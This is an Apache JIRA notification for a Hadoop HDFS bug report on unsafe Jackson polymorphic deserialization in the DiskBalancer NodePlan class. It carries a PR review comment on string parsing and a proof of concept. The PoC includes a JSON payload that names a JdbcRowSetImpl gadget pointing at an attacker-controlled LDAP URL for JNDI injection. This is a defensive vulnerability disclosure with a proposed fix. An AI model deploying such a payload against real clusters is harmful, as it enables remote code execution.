[ 
https://issues.apache.org/jira/browse/HDFS-17874?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18055261#comment-18055261
 ] 

ASF GitHub Bot commented on HDFS-17874:
---------------------------------------

pjfanning commented on code in PR #8196:
URL: https://github.com/apache/hadoop/pull/8196#discussion_r2743047136


##########
hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java:
##########
@@ -243,22 +244,11 @@ private static boolean stepClassIsAllowed(String className) {
     return false;
   }
 
-  private static List<String> getAllowedPackages() {
-    String packages = CONFIGURATION.get(SUPPORTED_PACKAGES_CONFIG_NAME);
-    return parseCsvLine(packages);
-  }
-
-  static List<String> parseCsvLine(final String line) {
-    if (line == null) {
-      return Collections.emptyList();
-    }
-    List<String> values = new LinkedList<>();
-    for (String value : line.split(",")) {
-      String trimmedValue = value.trim();
-      if (!trimmedValue.isBlank()) {
-        values.add(trimmedValue);
-      }
-    }
-    return values;
+  private static Collection<String> getAllowedPackages() {
+    return CONFIGURATION.getStringCollection(SUPPORTED_PACKAGES_CONFIG_NAME)
+        .stream()
+        .map(String::trim)

Review Comment:
   StringUtils.getStringCollection uses the legacy and discouraged java.util.StringTokenizer.
   This StringTokenizer does not trim values - it only strips the delimiter itself, so stray whitespace after a comma, for instance, is returned as part of the token.
   
   ```java
     public static void main(String[] args) {
       String text = "a, b";
       java.util.StringTokenizer tokenizer = new java.util.StringTokenizer(text, ",");
       while (tokenizer.hasMoreTokens()) {
         System.out.println("<" + tokenizer.nextToken() + ">");
       }
       // prints "<a>" then "< b>" - the leading space before "b" is kept
     }
   ```
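   For comparison, a self-contained sketch (class name purely illustrative) of a split that trims tokens and drops blank entries, which is what the removed `parseCsvLine` did:
   ```java
     import java.util.List;
     import java.util.stream.Collectors;
     import java.util.stream.Stream;

     public class TrimCsvDemo {
       public static void main(String[] args) {
         String text = "a, b, ,c";
         // Split on commas, trim each token, and drop blank entries.
         List<String> values = Stream.of(text.split(","))
             .map(String::trim)
             .filter(s -> !s.isEmpty())
             .collect(Collectors.toList());
         System.out.println(values);  // [a, b, c]
       }
     }
   ```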
   





> Unsafe Jackson Polymorphic Deserialization in HDFS DiskBalancer NodePlan
> ------------------------------------------------------------------------
>
>                 Key: HDFS-17874
>                 URL: https://issues.apache.org/jira/browse/HDFS-17874
>             Project: Hadoop HDFS
>          Issue Type: Bug
>          Components: diskbalancer
>    Affects Versions: 3.4.2
>            Reporter: Cyl
>            Priority: Major
>              Labels: pull-request-available
>
> h3. Summary
> The {{NodePlan}} class in Apache Hadoop HDFS DiskBalancer uses 
> {{@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)}} annotation, which allows 
> user-controlled JSON input to specify arbitrary Java class names for 
> instantiation during deserialization. While current exploitation is partially 
> mitigated by type constraints and Jackson's internal blocklist, this 
> represents a dangerous coding pattern that could lead to Remote Code 
> Execution (RCE) if mitigations are bypassed.
> h3. Details
> The vulnerability exists in {{NodePlan.java}} where the {{volumeSetPlans}} 
> field is annotated with Jackson's polymorphic type handling:
>  
> {code:java}
> // File: hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java
> @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS,
>     include = JsonTypeInfo.As.PROPERTY, property = "@class")
> private List<Step> volumeSetPlans;
> {code}
> When a user executes the DiskBalancer command with a plan file:
>  
> {{hdfs diskbalancer -execute <plan_file.json>}}
> The JSON file is parsed via {{{}NodePlan.parseJson(){}}}:
>  
> {code:java}
> public static NodePlan parseJson(String json) throws IOException {
>   return READER.readValue(json);  // Deserializes with @JsonTypeInfo
> }
> {code}
> Jackson reads the {{@class}} property from the JSON and attempts to 
> instantiate the specified class. An attacker can craft a malicious JSON file 
> specifying a gadget class (e.g., {{{}JdbcRowSetImpl{}}}) to trigger JNDI 
> injection or other exploitation chains.
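> For illustration, a minimal, benign sketch of this mechanism (the class and field names below are hypothetical, not from NodePlan): the JSON's {{@class}} value, not the declared Java type, decides which class Jackson instantiates.
> {code:java}
> import com.fasterxml.jackson.annotation.JsonTypeInfo;
> import com.fasterxml.jackson.databind.ObjectMapper;
> import java.util.List;
>
> public class ClassIdDemo {
>   // Same annotation shape as on volumeSetPlans.
>   @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS,
>       include = JsonTypeInfo.As.PROPERTY, property = "@class")
>   public interface Shape {}
>
>   public static class Circle implements Shape {
>     public double radius;
>   }
>
>   public static class Holder {
>     public List<Shape> shapes;
>   }
>
>   public static void main(String[] args) throws Exception {
>     // The JSON, not the Java code, names the class to instantiate.
>     String json = "{\"shapes\":[{\"@class\":\"ClassIdDemo$Circle\",\"radius\":2.0}]}";
>     Holder h = new ObjectMapper().readValue(json, Holder.class);
>     System.out.println(h.shapes.get(0).getClass());  // class ClassIdDemo$Circle
>   }
> }
> {code}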
> *Attack Chain:*
>  
> {noformat}
> User submits malicious plan JSON
>     → hdfs diskbalancer -execute <malicious_plan.json>
>     → ExecuteCommand.submitPlan()
>     → NodePlan.parseJson(planData)
>     → Jackson ObjectMapper.readValue() with @JsonTypeInfo
>     → Attempts arbitrary class instantiation via "@class" property
> {noformat}
> h3. PoC
>  # {*}Setup Environment{*}: Deploy a Hadoop cluster with DiskBalancer enabled.
>  # {*}Create Malicious Payload{*}: Save the following as 
> {{{}malicious_plan.json{}}}:
>  
> {{{"volumeSetPlans": [{"@class": 
> "com.sun.rowset.JdbcRowSetImpl","dataSourceName": 
> "ldap://attacker.com:1389/Exploit","autoCommit": true}],"nodeName": 
> "victim-datanode","nodeUUID": "00000000-0000-0000-0000-000000000000","port": 
> 9867,"timeStamp": 1234567890000}}}
>  # {*}Execute Attack{*}:
>  
> {code:bash}
> # On a machine with HDFS client access
> hdfs diskbalancer -execute malicious_plan.json
> {code}
>  # {*}Observed Behavior{*}:
>  ** With current mitigations: {{InvalidTypeIdException: Not a subtype of 
> Step}}
>  ** Without mitigations (older Jackson/custom Step gadget): JNDI connection 
> to attacker server
>  # {*}Alternative Test (Direct API){*}:
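> A hedged sketch of such a direct test (the class name here is illustrative; it assumes the {{malicious_plan.json}} payload above and the {{NodePlan.parseJson()}} method shown in Details):
> {code:java}
> import java.nio.charset.StandardCharsets;
> import java.nio.file.Files;
> import java.nio.file.Paths;
> import org.apache.hadoop.hdfs.server.diskbalancer.planner.NodePlan;
>
> public class ParseJsonDirectTest {
>   public static void main(String[] args) throws Exception {
>     String json = new String(
>         Files.readAllBytes(Paths.get("malicious_plan.json")), StandardCharsets.UTF_8);
>     // With the current mitigations this call is expected to fail with
>     // InvalidTypeIdException ("Not a subtype of ... Step").
>     NodePlan plan = NodePlan.parseJson(json);
>     System.out.println("Parsed plan: " + plan);
>   }
> }
> {code}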
> h3. Impact
>  * {*}Potential RCE{*}: If a gadget class implementing the {{Step}} interface 
> exists in the classpath (via third-party plugins or future code changes), 
> full Remote Code Execution is achievable.
>  * {*}Defense-in-Depth Violation{*}: The code relies entirely on external 
> mitigations (Jackson blocklist, type constraints) rather than implementing 
> proper input validation.
>  * {*}Future Risk{*}: New gadget classes are regularly discovered. The 
> blocklist may not cover all future threats.
> h3. Affected products
>  * {*}Ecosystem{*}: Maven
>  * {*}Package name{*}: org.apache.hadoop:hadoop-hdfs
>  * {*}Affected versions{*}: All versions using {{@JsonTypeInfo(use = 
> JsonTypeInfo.Id.CLASS)}} in NodePlan.java (Confirmed in 3.x branch)
>  * {*}Patched versions{*}:
> h3. Severity
>  * {*}Severity{*}: Medium (currently mitigated) / High (if mitigations 
> bypassed)
>  * {*}Vector string{*}: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (6.7)
>  ** Attack Vector: Local (requires access to submit DiskBalancer plans)
>  ** Attack Complexity: High (requires bypass of type constraints)
>  ** Privileges Required: Low (authenticated HDFS user)
> h3. Weaknesses
>  * {*}CWE{*}: CWE-502: Deserialization of Untrusted Data
> h3. Occurrences
> ||Permalink||Description||
> |[https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java#L34-L36]|The
>  {{@JsonTypeInfo(use=Id.CLASS)}} annotation on {{volumeSetPlans}} field 
> allows user-controlled class instantiation.|
> |[https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/diskbalancer/planner/NodePlan.java#L160-L162]|The
>  {{parseJson()}} method that deserializes user-provided JSON without 
> additional validation.|
> h3. Recommended Fix
> Replace the dangerous {{@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)}} pattern
> with a safe alternative: *use a concrete type*.
> {code:java}
> // Remove polymorphic deserialization entirely
> private List<MoveStep> volumeSetPlans;  // Concrete type instead of interface
> {code}
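> A hedged sketch of how the relevant parts of NodePlan could look under this approach (assuming MoveStep is the only Step implementation the planner produces):
> {code:java}
> // No @JsonTypeInfo: the element type is fixed at compile time, so the JSON
> // can no longer name an arbitrary class to instantiate.
> private List<MoveStep> volumeSetPlans;
>
> public static NodePlan parseJson(String json) throws IOException {
>   // Unchanged; an "@class" property in the input is now just an unknown
>   // field (rejected or ignored by the mapper), not a class to load.
>   return READER.readValue(json);
> }
> {code}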



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
